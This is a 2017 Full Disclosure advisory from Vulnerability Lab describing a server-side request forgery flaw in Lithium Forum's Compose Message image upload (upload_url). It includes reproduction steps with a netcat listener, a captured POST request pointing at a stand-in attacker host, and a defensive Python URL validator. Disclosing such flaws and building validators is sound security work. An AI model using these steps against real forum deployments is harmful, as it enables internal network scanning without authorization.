List: full-disclosure
Subject: [FD] Lithium Forum - (Compose Message) SSRF Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2017-02-20 10:04:09
Message-ID: 39468772-cd58-6c5d-e7fa-31adcd09ae96 () vulnerability-lab ! com
Document Title:
===============
Lithium Forum - (Compose Message) SSRF Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2030
Release Date:
=============
2017-02-20
Vulnerability Laboratory ID (VL-ID):
====================================
2030
Common Vulnerability Scoring System:
====================================
5.7
Product & Service Introduction:
===============================
Lithium Technologies provides social customer experience management software for the \
enterprise. Headquartered in San Francisco, Lithium has additional offices in London, Austin, \
Paris, Sydney, Singapore, New York, and Zürich. Lithium was founded in 2001 as a spin-out \
from GX Media, which created technologies for professional rankings and tournaments and now \
hosts a number of popular gaming sites. The company's founders include brothers Lyle Fong and \
Dennis Fong, who together also founded GX Media, as well as Kirk Yokomizo, John Joh, Nader \
Alizadeh, Michel Thouati, Michael Yang, and Matt Ayres. The company sells largely to enterprise \
customers, including HP, Best Buy, Research In Motion, Sony, Comcast, Symantec, and AT&T.
(Copy of the Vendor Homepage: https://en.wikipedia.org/wiki/Lithium_Technologies )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a server side request forgery \
vulnerability in the official Lithium Forum online service web-application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Lithium Technologies
Product: Lithium Forum - Web Application (API) 2017 Q1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A server-side request forgery (SSRF) vulnerability has been discovered in the official Lithium Forum online service web application. The vulnerability allows remote attackers to scan the internal and external network, using the response time of the server-side request as the signal.
The vulnerability is located in the official Community Compose Message function. The attack vector is on the application side of the service and the request method used is POST; the execution point is likewise the Compose Message function. During testing and research we found that several large vendors, including eBay, Vodafone, AT&T, PayPal, Microsoft, Skype and Sony, use the commercial Lithium web application.
The security risk of the vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) score of 5.7. Exploitation of the SSRF web vulnerability requires a low-privilege web application user account and no user interaction. Successful exploitation results in a local/external port scan and possibly mail spoofing via header redirection.
Affected Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Lithium Forum - Community - Compose Message
Vulnerable Parameter(s):
[+] upload_url
Proof of Concept (PoC):
=======================
The server-side request forgery web vulnerability can be exploited by remote attackers with a low-privileged web application user account and low user interaction. For security demonstration or to reproduce the security vulnerability, follow the information and steps below.
Manual steps to reproduce the vulnerability ...
1. Register a Lithium forum account and log in to the web application.
2. Open the link "t5/notes/privatenotespage/tab/compose".
3. Click "add images".
4. Open netcat on the attacker's machine and listen on port 1337.
5. Insert the following URL as the image: "http://your-host.com:1337/mypicture.jpg"
6. After submitting, a connection appears in the netcat session.
7. The vulnerability is successfully reproduced.
netcat logs:
root@xxxxxxx:~# nc -l -v -p 1337
listening on [any] 1337 ...
Warning: forward host lookup failed for outbound.sj.lithium.com: Unknown host
connect to [*********] from outbound.sj.lithium.com [***.**.***.253] 60592
GET /mypicture.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like \
Gecko) Chrome/53.0.2785.116 Safari/537.36
Accept: image/webp,image/*,*/*
Host: your-host.com:1337
--- PoC Session Logs [POST] ---
POST /api/2.0/images HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/plain, */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Application-Identifier: DESKTOP
Application-Version: 2.0.0
Referer: https://*****/t5/notes/composepage/note-to-user-id/584604
Content-Length: 158
Cookie: *censored* LithiumUserInfo=9403260; \
LithiumUserSecure=9e27764c-7d10-48e2-80c4-70fc955d7432
Connection: keep-alive
{"data":{"upload_url":"http://my-host.top:1337/blablablda.jpg","title":"blablablda","description":"","visibility":"draft","album":{"id":"35418"},"type":"image"}}
HTTP/1.1 500 Internal Server Error
Date: Wed, 01 Feb 2017 09:24:14 GMT
Server: Apache
x-frame-options: SAMEORIGIN
Content-Length: 152
Connection: close
Content-Type: application/json;charset=UTF-8
Reference(s):
http://community.[WEBSITE].com/
http://community.[WEBSITE].com/t5/
http://community.[WEBSITE].com/api/2.0/images
http://community.[WEBSITE].com/t5/notes/privatenotespage/tab/compose
Solution - Fix & Patch:
=======================
Restrict the protocols the server is allowed to use for server-side requests (do not fetch arbitrary http URLs on behalf of the user) and change how the upload_url input is validated.
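One way to implement that validation for the upload_url parameter, as an added example that is not Lithium's code: allow only https to port 443, reject credentials in the URL, and refuse any host that resolves to a loopback, private, link-local or other internal address. The resolver table and the hostnames in it are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed policy for this example: only https on 443, never to internal hosts.
ALLOWED_SCHEMES = {"https"}
ALLOWED_PORTS = {443}
DENIED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]

# Constructed DNS table standing in for a real resolver (hypothetical hosts).
FAKE_DNS = {"cdn.example.com": ["203.0.113.10"],
            "rebind.example": ["203.0.113.11", "10.0.0.5"],
            "v6.example": ["::ffff:127.0.0.1"]}

def fake_resolve(hostname):
    return FAKE_DNS.get(hostname, [])

def is_denied_address(addr):
    """True if addr is loopback, private, link-local or otherwise internal."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:10.0.0.1 as 10.0.0.1
    return any(ip in net for net in DENIED_NETWORKS)

def validate_upload_url(url, resolve=fake_resolve):
    """Return (ok, reason). resolve(host) -> list of IP strings; the fetcher
    should connect to the address checked here rather than resolve again,
    otherwise a changed DNS answer (rebinding) slips past the check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    try:
        port = parts.port if parts.port is not None else 443
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    addrs = resolve(parts.hostname)
    if not addrs:
        return False, "host did not resolve"
    for addr in addrs:
        try:
            if is_denied_address(addr):
                return False, "%s resolves to internal address %s" % (parts.hostname, addr)
        except ValueError:
            return False, "unparsable address %r" % addr
    return True, "ok"
```

The fetch that follows must also refuse to follow redirects (or re-run this check on every hop), since a permitted external host can otherwise redirect the server to an internal one.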
Security Risk:
==============
The security risk of the server side request forgery web vulnerability is estimated as medium. \
(CVSS 5.7)
Credits & Authors:
==================
Vibhuti R V Nath - [vibhuti123_i@yahoo.co.in] \
(http://www.vulnerability-lab.com/show.php?user=VibhutiNath)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for consequential or incidental damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material, contact (admin@) to ask for permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/